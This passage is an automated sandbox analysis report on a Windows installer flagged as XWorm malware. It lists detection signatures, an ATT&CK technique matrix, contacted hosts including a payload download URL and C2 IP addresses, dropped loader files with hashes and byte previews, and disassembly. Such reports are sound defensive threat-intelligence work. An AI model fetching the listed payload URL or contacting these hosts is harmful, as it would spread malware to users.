            Source: C:\Users\user\Desktop\103__Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00B7EF28
            Source: C:\Users\user\Desktop\103__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\103__Installer.exeCode function: 0_2_00B741BA GetSystemTimeAsFileTime,__aulldiv,0_2_00B741BA
            Source: C:\Users\user\Desktop\103__Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.16.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.16.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.16.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.16.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\103__Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 103__Installer.exe PID: 7572, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 103__Installer.exe PID: 7572, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory151
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
            Virtualization/Sandbox Evasion
            Security Account Manager141
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials34
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            103__Installer.exe21%ReversingLabs
            103__Installer.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://upx.sf.net0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://guanlix.cn:881/103.ccp0%Avira URL Cloudsafe
            http://guanlix.cn:881/103.ccpq0%Avira URL Cloudsafe
            59.56.110.1030%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            guanlix.cn
            91.208.240.157
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://guanlix.cn:881/103.ccpfalse
              • Avira URL Cloud: safe
              unknown
              59.56.110.103true
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://upx.sf.netAmcache.hve.16.drfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name103__Installer.exe, 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://guanlix.cn:881/103.ccpq103__Installer.exe, 00000000.00000002.3334093675.00000000014F0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              91.208.240.157
              guanlix.cnunknown
              139659LUCID-AS-APLUCIDACLOUDLIMITEDHKfalse
              59.56.110.103
              unknownChina
              133774CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCNtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1466314
              Start date and time:2024-07-02 19:23:56 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 2s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:103__Installer.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@2/7@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 28
              • Number of non-executed functions: 34
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.42.65.92
              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • VT rate limit hit for: 103__Installer.exe
              TimeTypeDescription
              13:24:49API Interceptor6439886x Sleep call for process: 103__Installer.exe modified
              13:28:12API Interceptor1x Sleep call for process: WerFault.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              91.208.240.15733__Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/330.ccp
              31__Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/31.ccp
              103-o_Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/103.ccp
              31-o_Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/31.ccp
              33-o_Installer.exeGet hashmaliciousXWormBrowse
              • guanlix.cn:881/33.ccp
              59.56.110.103103-o_Installer.exeGet hashmaliciousXWormBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                guanlix.cn33__Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                31__Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                103-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                31-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                33-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN103-o_Installer.exeGet hashmaliciousXWormBrowse
                • 59.56.110.103
                mirai.spc.elfGet hashmaliciousMiraiBrowse
                • 203.15.232.74
                DCwYFBy6z7.elfGet hashmaliciousMirai, MoobotBrowse
                • 121.204.142.151
                WE4VRokml7.elfGet hashmaliciousMirai, MoobotBrowse
                • 27.151.169.129
                #U6700#U65b0#U7cfb#U7edf#U4e0a#U7ebf#U5bf9#U63a5#U6750#U6599#U4fe1#U606f_1282137129312371283.exeGet hashmaliciousCobaltStrikeBrowse
                • 121.207.229.248
                7e5.docx.docGet hashmaliciousUnknownBrowse
                • 27.155.113.139
                16knGm6BfY.elfGet hashmaliciousMirai, MoobotBrowse
                • 59.56.113.151
                skt.ppc.elfGet hashmaliciousMiraiBrowse
                • 27.157.108.170
                wO2hW34tnC.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                • 218.66.110.222
                sora.arm.elfGet hashmaliciousMiraiBrowse
                • 27.157.108.174
                LUCID-AS-APLUCIDACLOUDLIMITEDHK33__Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                31__Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                103-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                31-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                33-o_Installer.exeGet hashmaliciousXWormBrowse
                • 91.208.240.157
                https://telegram-wv.icu/Get hashmaliciousUnknownBrowse
                • 103.143.81.212
                #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
                • 45.136.13.176
                #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
                • 45.136.13.176
                CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
                • 103.143.81.180
                CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
                • 103.143.81.180
                No context
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):1.2517547462549623
                Encrypted:false
                SSDEEP:192:RqYfuOi2UN0BU/AjZTD4yX66zuiFAZ24IO8w:YYfuOi29BU/AjWyX/zuiFAY4IO8w
                MD5:C5E9A958D70D40923D453882DCAAE84F
                SHA1:8A599622D0DA2A33BE9EF6452677DC3766F9E2E4
                SHA-256:D03EC714151BA896B4ECFB29D3F9C50C01DBDF7F278B1E36BF9EA219C0E773A3
                SHA-512:E2F0A9A643BC49B4C74200B553D2E1BFB2DCA2389E87A167C1E18D2B725AEB6844C41C8735DE1389297EC05D6F805B19EB96127361BBB5B2DB92110DD51DC6B3
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.1.4.8.8.5.7.0.4.2.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.1.4.8.8.6.4.0.7.3.7.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.d.5.5.6.3.0.-.6.2.7.c.-.4.9.5.4.-.8.8.1.4.-.5.f.2.f.9.4.3.2.6.4.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.3.5.1.4.4.0.-.2.2.f.b.-.4.1.6.f.-.b.4.f.2.-.5.8.5.4.6.4.1.a.1.d.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.0.3._._.I.n.s.t.a.l.l.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.w.i.n.d.o.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.4.-.0.0.0.1.-.0.0.1.3.-.a.c.6.c.-.0.6.b.a.a.4.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.9.7.0.0.f.2.2.c.2.1.d.e.6.6.9.8.0.0.b.6.6.3.4.6.b.e.3.b.6.8.0.0.0.0.0.9.1.c.!.0.0.0.0.5.f.2.6.b.9.0.0.1.c.0.4.8.2.f.1.0.1.8.c.e.1.5.3.e.5.8.c.a.f.6.1.e.8.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 14 streams, Tue Jul 2 17:28:06 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):353771
                Entropy (8bit):3.5682967330200746
                Encrypted:false
                SSDEEP:3072:MhwFpka8T4uEqxmeLTg/NyHm1vUaGyDe3UF6:qwYa8T4OpTg/NyHUVhK+6
                MD5:9A602E3F6AB0AF82F58F8F6F2E9C65DF
                SHA1:9DE0202FAFF890A9CF9074CCF10176847F7F789E
                SHA-256:427975DED050EB244A10AF1575C1EE921538BEEBF5E083957AB4613C37F863CD
                SHA-512:228FFEC8E31DA91460CEDDE08775DDE58B4C90207E8BF30C3FCA3A10E80435ECB0604EC962E8DEE86301DDACD79B7E5E3DA90F1E7699C3E0EEAF43982C3AD229
                Malicious:false
                Reputation:low
                Preview:MDMP..a..... ........8.f........................0"..........d+..dh..........T.......8...........T...........0S..............<,..........(...............................................................................eJ..............GenuineIntel............T............7.f....r........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8434
                Entropy (8bit):3.696449317246591
                Encrypted:false
                SSDEEP:192:R6l7wVeJyJx67p6YWGSU+4kgmfZYAVbprZ89bpJsfpDm:R6lXJyf6N6Y3SUKgmfSAVwpifw
                MD5:EE824B01C41E286E2A2CB3D12C388F92
                SHA1:BC957467F5B7C9CAC693B45AFB00C9FEB4779A70
                SHA-256:C2872A72E55A0691CCF848D5E2134F1DC8868B6D0BE03A4E04320DA6E2DF70B7
                SHA-512:3041124FA99D9612F0D9574FE2D5D0031A3D6C98F547B511A6AF957CB9DE65B7550DF61EC1C11A22B3518F9A87B24C26778F235789C1583A39A4452DB16CAE46
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.2.<./.P.i.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4765
                Entropy (8bit):4.457823322209864
                Encrypted:false
                SSDEEP:48:cvIwWl8zsmnNJg77aI9H2zNWpW8VY8Ym8M4JMrtBFK+q8vqtHPAS88WSycd:uIjfmnnI7Q47V4JtK+P7Nycd
                MD5:0B2EF78F46E97AE88DCE37A6354C7258
                SHA1:F5CDAB970C54A86C622D2649E9A44638465A6C65
                SHA-256:8A1AFAA3BDFE79D9252D4D6405F80712E7C164D246D4C6A01F4F6671B5805AFD
                SHA-512:892038D30ABB9CF8AE0D5CF4963D76A1B7ABF0CC91C2BA82C5AFF0FFD6EF4166CB7AE16DDEB28D5E15A0F6E603252CD9A6012BE61314088F45A5583AC642305C
                Malicious:false
                Reputation:low
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="393630" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Users\user\Desktop\103__Installer.exe
                File Type:data
                Category:dropped
                Size (bytes):71938
                Entropy (8bit):7.604678512981776
                Encrypted:false
                SSDEEP:1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
                MD5:30DD8CD1E4557604F2F904623AC15350
                SHA1:4605B3E8F3FDDA4E22389CC655842D67A5A02D65
                SHA-256:6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
                SHA-512:B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
                Malicious:false
                Yara Hits:
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
                Reputation:low
                Preview:........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....*4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..|...."/*}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....
                Process:C:\Users\user\Desktop\103__Installer.exe
                File Type:data
                Category:dropped
                Size (bytes):71938
                Entropy (8bit):7.604678512981776
                Encrypted:false
                SSDEEP:1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
                MD5:30DD8CD1E4557604F2F904623AC15350
                SHA1:4605B3E8F3FDDA4E22389CC655842D67A5A02D65
                SHA-256:6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
                SHA-512:B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
                Malicious:false
                Yara Hits:
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp, Author: unknown
                Reputation:low
                Preview:........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....*4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..|...."/*}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.296059831234597
                Encrypted:false
                SSDEEP:6144:U41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+wW/mBMZJh1Vjt:J1/YCW2AoQ0Nid/wMHrVp
                MD5:47D4670EBAE6F1E7C598895C7D988734
                SHA1:2F34B43524FC00693304B32BA4C3E3787466C59E
                SHA-256:309D2E3911C9601B4E21C2054DBC6AC8340A515E14D249B64563B54FAF735D8A
                SHA-512:AD7B92972225CF1FCFEBD8FBE9798A03FD187E7C1B51479F04ABC31761913F6DE2047C9BC075590DCCCB09FEFEAA7B8B84001977159252EB261335663F582D0C
                Malicious:false
                Reputation:low
                Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.#.2............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):5.938024130303621
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:103__Installer.exe
                File size:249'344 bytes
                MD5:fba295e75a2c2fd0f205da0a14b76859
                SHA1:5f26b9001c0482f1018ce153e58caf61e80ecb8f
                SHA256:86ed9f7125ae452d28f9eabd11f5cc9bef747fb751a5aa1283a0ab24952cf508
                SHA512:0570f038d1ee0892ff66aa47b8b8ceca5790f467188b16a5c968f0bfc2891882b3441d090db1b586861a6a84756d2dbcf54e9360970638d5ae987477f012e283
                SSDEEP:3072:NPl4G474Poo9JkbXjEU+QVUjsbCeg2SbAe4ZQeAnuTCt2xbzmyoaq6rcYsc8kOeu:NPW745r2XgUsjsbOZnjZ2x4
                TLSH:15345B92F6C0D4B6D8170175983ACEB2126BBE798974110B36E9372F5EB72831937E07
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L....b.f.................v...T.....
                Icon Hash:20246c0c56e20926
                Entrypoint:0x405b41
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x668362D5 [Tue Jul 2 02:15:49 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:0b47c746b58dc722dcec07246158fda2
                Instruction
                call 00007F746094B1B5h
                jmp 00007F7460943C8Eh
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                test eax, eax
                je 00007F7460943E14h
                sub eax, 08h
                cmp dword ptr [eax], 0000DDDDh
                jne 00007F7460943E09h
                push eax
                call 00007F74609426EFh
                pop ecx
                pop ebp
                ret
                mov edi, edi
                push ebp
                mov ebp, esp
                mov eax, dword ptr [ebp+08h]
                push esi
                mov esi, ecx
                mov byte ptr [esi+0Ch], 00000000h
                test eax, eax
                jne 00007F7460943E65h
                call 00007F7460947A1Eh
                mov dword ptr [esi+08h], eax
                mov ecx, dword ptr [eax+6Ch]
                mov dword ptr [esi], ecx
                mov ecx, dword ptr [eax+68h]
                mov dword ptr [esi+04h], ecx
                mov ecx, dword ptr [esi]
                cmp ecx, dword ptr [004201F8h]
                je 00007F7460943E14h
                mov ecx, dword ptr [0041FFB0h]
                test dword ptr [eax+70h], ecx
                jne 00007F7460943E09h
                call 00007F746094BB8Fh
                mov dword ptr [esi], eax
                mov eax, dword ptr [esi+04h]
                cmp eax, dword ptr [0041FEB8h]
                je 00007F7460943E18h
                mov eax, dword ptr [esi+08h]
                mov ecx, dword ptr [0041FFB0h]
                test dword ptr [eax+70h], ecx
                jne 00007F7460943E0Ah
                call 00007F746094B3EEh
                mov dword ptr [esi+04h], eax
                mov eax, dword ptr [esi+08h]
                test byte ptr [eax+70h], 00000002h
                jne 00007F7460943E16h
                or dword ptr [eax+70h], 02h
                mov byte ptr [esi+0Ch], 00000001h
                jmp 00007F7460943E0Ch
                mov ecx, dword ptr [eax]
                mov dword ptr [esi], ecx
                mov eax, dword ptr [eax+04h]
